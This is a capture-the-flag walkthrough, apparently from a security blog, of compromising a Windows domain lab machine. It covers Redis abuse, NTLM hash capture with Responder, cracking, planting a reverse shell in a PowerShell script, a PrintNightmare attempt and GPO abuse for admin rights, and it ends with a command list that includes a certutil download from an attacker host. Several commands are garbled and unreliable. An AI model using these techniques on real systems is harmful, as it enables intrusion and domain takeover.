In this walk-through, we covered enumerating a Redis No SQL database and exploiting print spooler service CVE-2021-34527 or what’s called the PrintNightMare and group policy in Active Directory.

VulnNet Entertainment had a bad time with their previous network which suffered multiple breaches. Now they moved their entire infrastructure and hired you again as a core penetration tester. Your objective is to get full access to the system and compromise the domain.

  • Difficulty: Medium
  • Operating System: Windows

Another Windows machine. Do your best and breach it, good luck!

Initial Scans and User Flag

I started with an Nmap scan, which showed a Redis database running. After installing the redis-cli tool, I connected to the database and used the info command to confirm it was running on Windows.

To get the user flag, I used the eval command in Redis to try and display a sensitive file. This actually caused an error that conveniently spat out the user flag for me.

Getting a Foothold

Next, I used the config get star command to find exposed directories and the username “enterprise security”. To get this user’s NTLM hash, I set up a Responder listener on my machine and used a Redis command to make the target machine connect back to me.

With the captured hash, I used Hashcat to crack it and get the password. I then used the SMB client to connect to the server and found a PowerShell script. I downloaded the script, added a reverse shell payload to it, and re-uploaded it. After setting up a Netcat listener, the executed script gave me a shell as the “enterprise security” user.

Privilege Escalation Attempts

My first thought for privilege escalation was to try the PrintNightmare vulnerability, since the Nmap scan showed the Windows Print Spooler service was running. I used rpcmap.py to check for the vulnerability and even created a malicious DLL with msfvenom. However, when I tried to run the exploit, it failed.

So, I switched gears and decided to use BloodHound. I transferred the SharpHound.exe collector to the target machine, ran it to collect Active Directory data, and then analyzed the data back on my machine.

BloodHound showed me that the “enterprise security” user had “GenericWrite” access to a Group Policy Object (GPO). I used SharpGPOAbuse.exe to exploit this by adding a scheduled task to the GPO that would add the “enterprise security” user to the local “Administrators” group. I forced the policy update with gpupdate /force, and just like that, I had admin rights!

Getting the System Flag 🚩

With my new admin privileges, I used the SMB client to access the C$ share on the target machine. From there, it was just a matter of navigating to the administrator’s desktop and grabbing the system flag.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

  • sudo apt get install redis cli
  • redust cli -h [IP]
  • eval
  • config get star
  • sudo responder -I [interface]
  • hash cat
  • smb client -L [IP] -U [user]
  • invoke-expression
  • python3 rpc map
  • msf venom
  • use multi/handler
  • sudo python3 -m http.server 80
  • certutil.exe -urlcache -f http://[IP]/[file] [file]
  • sharphound.exe
  • copy [source] \\[IP]\[share]
  • sharp gpu appeals
  • gpu update /force
  • get system.txt
What is the user flag? (Desktop\user.txt)

What is the system flag? (Desktop\system.txt)

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles